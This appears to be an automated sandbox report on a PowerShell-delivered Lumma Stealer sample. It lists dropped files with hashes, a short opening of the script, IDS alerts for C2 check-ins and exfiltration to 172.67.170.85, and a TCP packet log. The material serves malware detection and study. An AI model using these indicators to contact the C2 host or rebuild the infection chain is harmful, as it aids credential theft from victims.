                                                                                                                                                                                                        Preview:..V..`........LyQQ.c..m]....PW.pZRh.`.a..Nv.Y.i.mx.x..R.Vja.y.d.L.u........N...k.Sh.U..V.K.tQ.klyO.jlu..C.a..hgE.od....g\v..PCHu.l..I.R..SB...\xu..A.\B.li.v..Xe.QOxLP....NElW....Eb.BD...Hs..v..TNyK...g..]D^b.v.vDMU.^m..Z..s.U_t.....r.e...l.Z....y...itf.Bg....g....C]qcp_.o..sw.H....j]QXTsjPiL.[w.n^...SrQf.X.d...k^YllAAL.r.nQ...JJbn.N...R..B.Sa..CV.mp.`P....rv.....T..O..kQ...B...sk..H.....i.m.I..aI......w.bJA...Pt...B.g._..ov....v.p.liS..hGIG.gBNZ.xf...ET.f...S.Q.ZS...q..oXn..Ds.q.C..y.wF^A..k...y.....SjV...py._riT..mx.M.g.qe....J...mNuOtS......t.NNeX.u...qQ.g.[kEP..jm.^P..l..G...b.Zr\Dg.MfV..kJ..k.`kyQnw.o.LE............yJ..me.r......Tx..y...U...R...F..r...]ty..BV.......dXO..RA.V...K..S.TK..YIhQmqu\...GGG..X...YEMwx[..I.wg.NjA...kLox..MYg..q..U^M..rr...Y...h.._..Uu.b....K.i..W..]..N...e..e.LB...l..VDW[..E....]g.[q.IwW.`b...F...WVO.Y..xt..`...sd]B..L....s.RLk....r.T._..wB.q.....PG..Bc..s...u.Cf..^b..yD.[.xcc^...NQq..b.....t...Lut.P...j...m..`ms..r.....C...Dm....N..n._psKuIavuTOOmHtJkR..w

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\ylqv

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):986746
                                                                                                                                                                                                        Entropy (8bit):7.867918664785953
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24576:bfMR7mqnsKaQ+RFiZhbvisb4E5aJZNFCPxmO8al:YR7mqn+RFATiF9NFCpms
                                                                                                                                                                                                        MD5:CF297F837262C0FBD5AD028C39A53B62
                                                                                                                                                                                                        SHA1:B6B54C0476C1F4168B829A9A475888BAF3B14012
                                                                                                                                                                                                        SHA-256:4CBDB194C720BC44A5B234FAAA03925EE9566DE6D814D9124DFA6767B41E03CB
                                                                                                                                                                                                        SHA-512:283D2B15A5F317910A5EB5BB74604894E3F36DD907254D98F26C2130A770B552DE6631AFD2D820DE0A9EA069643F19BC86884D719C0F8DFA4B1394FF7880D10B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:.R..FV...U_.fQpjF.pSZ..\n....dXO......UZU..L.U.....K..p.....E.t.S...er..L..v.XE..j.ie.TaQS.D.._.yw...o.Q.w.m...SU......gd.\XyQ.....p...R..ux.Ch.E.U.hT.gOi.JqBM..t...qLqe..`......K..HG.[].m....R.w..wFe.....^iMQ.Mbmi......o.C[...y.w..G..HM..UO..y.D..d.Lro.sW......J.Z[..yTY.........y...f.w.iYulDcV.xIm.l.gcQ.F.o.._`R.j.WM....^Rjh.......U.yj.g..K..L.G..]S..]NPV...Oo.L.V......k..gA..p..S..Q.P..H`V.e.T...DwR.....s..K.Yp._f...s.RE..l.n.....PO.sNt.IM.i.....argDt.D.._.......w.B..w.wj...O.....d.C..r.]fp..j..pB......`g......UH.n.FIEM.x\f.Dcyx...l..kX.TWRP..ne.tA..WTM.NFI..OP.i..Kp.W...S...gT.a...RJ..Sar.f....M.D[...YH...`n.p.y.Im.c..TT..d..hiO.Bi.a^.n...KUP.oeJW.JoQspIJET`..`..wS..^.MQ.R.Tpou.d...^P..[oB...B.V.D..tBv....uYDpw.C.S..QN.EX...F.....s......[.e...Uq..h.`.h....T....[.....c.DXj_S..t]...WU..E.Bl.i.l..V....P[..J..^.L.Rx.A..i`..H.]...[.jou......P.eG..VDKh.LLN....Q.g....Yv.iN.fx.ITl.aR..Om..GDm........Rn.jD.qYU....by.XtMErXi.......W.krpNK....\..T..Z....pP.T...sCx..g.t.hvrLZm.F........L...vmN.

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6221
                                                                                                                                                                                                        Entropy (8bit):3.7378750327179513
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:f/e33CxH29kkvhkvCCtF9LTJjUHngLTJjUHnC:f/eyWKHLpLB
                                                                                                                                                                                                        MD5:48AD97CBBAA9486A3BF86A661352D270
                                                                                                                                                                                                        SHA1:E0F838D9AC65C3FE8A044DBE999AF98DB0BF5AA7
                                                                                                                                                                                                        SHA-256:4C3B80211EC5464DB5999F7F440F3C2537A4B154188EC14D2E362B51272CB924
                                                                                                                                                                                                        SHA-512:9350259EFC1569D16C95A6630DAA536F31FA47ED5DEA34176960D9CC7FA3C04D64B9D23F2CF596B1A06729187EF23924C7FD9D311BBE5197AD72D9CCB1201622
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:...................................FL..................F.".. ...-/.v.....6.CmB..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.......?mB..\..CmB......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^}Y.u...........................%..A.p.p.D.a.t.a...B.V.1.....}Y.u..Roaming.@......CW.^}Y.u..........................2...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..........................|.p.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^}Y.u....Q...........

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7WPZY8CQUD25F3LZIP1J.temp

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6221
                                                                                                                                                                                                        Entropy (8bit):3.7378750327179513
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:f/e33CxH29kkvhkvCCtF9LTJjUHngLTJjUHnC:f/eyWKHLpLB
                                                                                                                                                                                                        MD5:48AD97CBBAA9486A3BF86A661352D270
                                                                                                                                                                                                        SHA1:E0F838D9AC65C3FE8A044DBE999AF98DB0BF5AA7
                                                                                                                                                                                                        SHA-256:4C3B80211EC5464DB5999F7F440F3C2537A4B154188EC14D2E362B51272CB924
                                                                                                                                                                                                        SHA-512:9350259EFC1569D16C95A6630DAA536F31FA47ED5DEA34176960D9CC7FA3C04D64B9D23F2CF596B1A06729187EF23924C7FD9D311BBE5197AD72D9CCB1201622
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:...................................FL..................F.".. ...-/.v.....6.CmB..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.......?mB..\..CmB......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^}Y.u...........................%..A.p.p.D.a.t.a...B.V.1.....}Y.u..Roaming.@......CW.^}Y.u..........................2...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..........................|.p.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^}Y.u....Q...........

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\tGQPJYHH.zip

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):26901385
                                                                                                                                                                                                        Entropy (8bit):7.998829610207703
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:786432:p3iBqL0gkrPWCd+qT7ubG1T6wJpRIMWo2:p3iBqIgW1/v4GB33co2
                                                                                                                                                                                                        MD5:EC9A1F58F7AACE01D209AADB3C0254FF
                                                                                                                                                                                                        SHA1:7E1706C415E58142E9F1EBE5C90466D8EF3F878F
                                                                                                                                                                                                        SHA-256:B63C17FD0F3122BDF59A2C444D54D54ECD1A866B5A4581F237043E541C1AABB8
                                                                                                                                                                                                        SHA-512:027C1011AF4E2685920E95F53063F56673BA370305DD2B9D764023F4A277FF2D90721A8016693D3121AA143FC4E3EAC9553BFE43329454A79A074B0A383AB7AA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:PK.........6zY^0.t(x..`.......python27.dll..g\.O.6./$.. .Pi...$.Q..........w.@.B.(.......H/. ....P.(.h..P.@.Y..i.s.{.....r......3.\...s... 2..q.*....@....7|B.p(..@.Uk..u......l.~.....w...n...v.v.1.,..g.f.a.L..G.!~...3..d^].......@.....[..k......+.p.?.>...;..K..a=.e..g..|. " .......U_.....8....{..=0.?...Fh......A...u.......:...%.G..#.@.K..../~...<.oZ.....1.....?..}}<....].^......p..%...V.!.1....D8O.f.../.!..u|T.6.....4......`.F.~`._ZC.@F5........= .4....6.O.|.............z.....d..[...~..'..nA....?..s.&.E.. ........D1"W...P.5Ml...2D#...I.. 8_nI.........d$.V.8*.ep..P &f.1..wb.M..$.6!fBZ.N4....jL.D.g.p.._.J.S.m.c.K}.#m......0.>...(.`.'PQJ....7<+.....W.~..X.....`.1U.R..,....A.nt...z.%c.0n..P..>.....%.g....P....ybn..>/..Bp!M)kO.*...m..K!..av.Gq%....%.?.r.#H...........Z.jh.0..3*4].5.nO.6q/Z.k?....UP+tB.L&.z.y.R.....z3.b9.%...E.<A".\.C...i...*..9..!-... .?......p.. .....`9d=....%...:.....a.....TS.;Z..;.k.-...K.ra...nY.....%.....7.w

                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                        General

                                                                                                                                                                                                        File type:ASCII text, with very long lines (65265), with CRLF line terminators
                                                                                                                                                                                                        Entropy (8bit):5.999389941414555
                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                          File name:bUAmCazc.ps1
                                                                                                                                                                                                          File size:35'869'954 bytes
                                                                                                                                                                                                          MD5:fa478f449dec7d97732bf290fd92b7bc
                                                                                                                                                                                                          SHA1:c08ed5100f487fe29245af63c388ead0b0e7b461
                                                                                                                                                                                                          SHA256:b352201272b66562cea2dda2ec8b6aa1a5b0718f794c9f7c75c74cbdce4e6d1b
                                                                                                                                                                                                          SHA512:4ef01f2283e8149f0cadd8e4532bab827b496d0eef1742056b389cf791247d0d19b171247b197d1743e86a5c6371b58d4f1016e6fbeefdf57b0e006b5cb4b7cb
                                                                                                                                                                                                          SSDEEP:49152:9Eke/hcd2zrXvgPQxp0esnK1o75AsocLIfx/TMuQ2oSVz+yI55vQdNO9YDByooBC:a
                                                                                                                                                                                                          TLSH:357733305E6A7DBA076CD23D307F6F1D1FA00F96804CE6DA53E464C716AEB90865BC29
                                                                                                                                                                                                          File Content Preview:.. $DjXtrvmw = "Stop".. Set-Location $Env:AppData.. $hPZFucyy = "$Env:AppData\FeGIPCnK".. if (Test-Path $hPZFucyy) {.. if (Test-Path "$Env:AppData\huhrUxLh.txt") {.. Remove-Item "$Env:AppData\huhrUxLh.txt".. }..

                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                          Icon Hash:3270d6baae77db44

                                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                                          Suricata IDS Alerts

                                                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                          2024-11-29T15:45:51.132831+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736172.67.170.85443TCP
                                                                                                                                                                                                          2024-11-29T15:45:54.094934+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449736172.67.170.85443TCP
                                                                                                                                                                                                          2024-11-29T15:45:54.094934+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449736172.67.170.85443TCP
                                                                                                                                                                                                          2024-11-29T15:45:55.504840+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737172.67.170.85443TCP
                                                                                                                                                                                                          2024-11-29T15:45:58.553704+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449737172.67.170.85443TCP
                                                                                                                                                                                                          2024-11-29T15:45:58.553704+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449737172.67.170.85443TCP
                                                                                                                                                                                                          2024-11-29T15:46:00.312055+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739172.67.170.85443TCP
                                                                                                                                                                                                          2024-11-29T15:46:04.505532+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449747172.67.170.85443TCP
                                                                                                                                                                                                          2024-11-29T15:46:09.082469+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449758172.67.170.85443TCP
                                                                                                                                                                                                          2024-11-29T15:46:13.869083+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449771172.67.170.85443TCP
                                                                                                                                                                                                          2024-11-29T15:46:16.481366+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449771172.67.170.85443TCP
                                                                                                                                                                                                          2024-11-29T15:46:18.572183+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449783172.67.170.85443TCP
                                                                                                                                                                                                          2024-11-29T15:46:24.527434+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449795172.67.170.85443TCP
                                                                                                                                                                                                          2024-11-29T15:46:27.314353+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449795172.67.170.85443TCP
                                                                                                                                                                                                          2024-11-29T15:46:29.110776+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449806104.26.2.16443TCP

                                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                          Nov 29, 2024 15:45:49.845685005 CET49736443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:45:49.845716953 CET44349736172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:49.845783949 CET49736443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:45:49.850085974 CET49736443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:45:49.850097895 CET44349736172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:51.132767916 CET44349736172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:51.132831097 CET49736443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:45:51.150580883 CET49736443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:45:51.150589943 CET44349736172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:51.150795937 CET44349736172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:51.223474026 CET49736443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:45:51.223500967 CET49736443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:45:51.223536968 CET44349736172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:54.094913960 CET44349736172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:54.094980001 CET44349736172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:54.095025063 CET49736443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:45:54.096432924 CET49736443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:45:54.096437931 CET44349736172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:54.096468925 CET49736443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:45:54.096472979 CET44349736172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:54.184326887 CET49737443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:45:54.184370995 CET44349737172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:54.184431076 CET49737443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:45:54.185370922 CET49737443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:45:54.185388088 CET44349737172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:55.504762888 CET44349737172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:55.504839897 CET49737443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:45:55.506093025 CET49737443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:45:55.506103992 CET44349737172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:55.506323099 CET44349737172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:55.507678032 CET49737443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:45:55.507694006 CET49737443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:45:55.507738113 CET44349737172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.553709030 CET44349737172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.553767920 CET44349737172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.553817987 CET49737443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.553833961 CET44349737172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.553929090 CET44349737172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.553957939 CET44349737172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.553967953 CET49737443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.553977013 CET44349737172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.554013968 CET49737443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.562212944 CET44349737172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.570689917 CET44349737172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.570760012 CET49737443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.570775986 CET44349737172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.629750967 CET49737443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.673753977 CET44349737172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.677970886 CET44349737172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.678020954 CET49737443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.678035021 CET44349737172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.719181061 CET49737443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.745630980 CET44349737172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.749671936 CET44349737172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.749722958 CET49737443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.749749899 CET44349737172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.749763966 CET44349737172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.749808073 CET49737443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.749908924 CET49737443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.749926090 CET44349737172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.749936104 CET49737443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.749941111 CET44349737172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.881949902 CET49739443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.881984949 CET44349739172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.882059097 CET49739443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.882344961 CET49739443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:45:58.882359982 CET44349739172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:00.311971903 CET44349739172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:00.312055111 CET49739443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:00.313419104 CET49739443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:00.313426971 CET44349739172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:00.313646078 CET44349739172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:00.314702034 CET49739443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:00.314800978 CET49739443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:00.314832926 CET44349739172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:00.314887047 CET49739443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:00.314893961 CET44349739172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:02.844702959 CET44349739172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:02.844789982 CET44349739172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:02.844847918 CET49739443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:02.844988108 CET49739443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:02.845005035 CET44349739172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:02.945164919 CET49747443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:02.945179939 CET44349747172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:02.945249081 CET49747443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:02.945476055 CET49747443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:02.945485115 CET44349747172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:04.505424023 CET44349747172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:04.505532026 CET49747443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:04.506644964 CET49747443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:04.506650925 CET44349747172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:04.506845951 CET44349747172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:04.507914066 CET49747443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:04.508008003 CET49747443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:04.508033037 CET44349747172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:07.083241940 CET44349747172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:07.083353043 CET44349747172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:07.083425999 CET49747443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:07.086028099 CET49747443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:07.086045027 CET44349747172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:07.667819977 CET49758443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:07.667855024 CET44349758172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:07.667916059 CET49758443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:07.668288946 CET49758443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:07.668301105 CET44349758172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:09.082359076 CET44349758172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:09.082468987 CET49758443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:09.083713055 CET49758443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:09.083729982 CET44349758172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:09.083962917 CET44349758172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:09.087610960 CET49758443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:09.087759972 CET49758443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:09.087801933 CET44349758172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:09.087884903 CET49758443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:09.087893963 CET44349758172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:12.178565979 CET44349758172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:12.178646088 CET44349758172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:12.178698063 CET49758443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:12.178783894 CET49758443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:12.178800106 CET44349758172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:12.621741056 CET49771443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:12.621776104 CET44349771172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:12.621869087 CET49771443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:12.622260094 CET49771443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:12.622271061 CET44349771172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:13.868978977 CET44349771172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:13.869082928 CET49771443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:13.870408058 CET49771443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:13.870414972 CET44349771172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:13.870655060 CET44349771172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:13.871844053 CET49771443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:13.871947050 CET49771443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:13.871952057 CET44349771172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:16.481388092 CET44349771172.67.170.85192.168.2.4
